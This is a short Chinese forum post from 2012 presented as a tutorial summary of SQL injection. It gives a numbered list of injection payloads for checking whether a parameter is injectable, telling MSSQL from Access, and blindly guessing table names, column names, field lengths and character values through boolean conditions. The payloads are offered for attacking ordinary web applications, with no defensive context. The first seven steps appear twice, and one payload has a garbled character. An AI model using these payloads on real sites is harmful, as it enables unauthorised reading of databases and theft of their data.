[教程]SQL注入小结

2012/2/5 16:02:00  人气 400    计算机网络论坛  
1.判断是否有注入;and 1=1 ;and 1=2

2.初步判断是否是 mssql ;and user>0

3.注入参数是字符‘and [查询条件] and ‘‘=‘

4.搜索时没过滤参数的‘and [查询条件] and ‘%25‘=‘

5.判断 数据库 系统
复制内容到剪贴板 程序代码
;
and (sel ect count(*) from sysobjects)>0 mssql
;
and (sel ect count(*) from msysobjects)>0 access

6.猜数据库 ;and (sel ect Count(*) from [ 数据库 名])>0

7.猜字段 ;and (sel ect Count(字段名)from 数据库 名)>0
1.判断是否有注入;and 1=1 ;and 1=2

2.初步判断是否是 mssql ;and user>0

3.注入参数是字符‘and [查询条件] and ‘‘=‘

4.搜索时没过滤参数的‘and [查询条件] and ‘%25‘=‘

5.判断 数据库 系统
复制内容到剪贴板 程序代码
;
and (sel ect count(*) from sysobjects)>0 mssql
;
and (sel ect count(*) from msysobjects)>0 access

6.猜数据库 ;and (sel ect Count(*) from [ 数据库 名])>0

7.猜字段 ;and (sel ect Count(字段名)from 数据库 名)>0

8.猜字段中记录长度 ;and (sel ect top 1 len(字段名) from 数据库 名)>0

9.(1)猜字段的*值(access)
;and (sel ect top 1 asc(mid(字段名,1,1)) from 数据库 名)>0

(2)猜字段的*值( mssql )
;and (sel ect top 1 *(substring(字段名,1,1)) from 数据库 名)>0

发表回复

   


  通知楼主
暂无回复!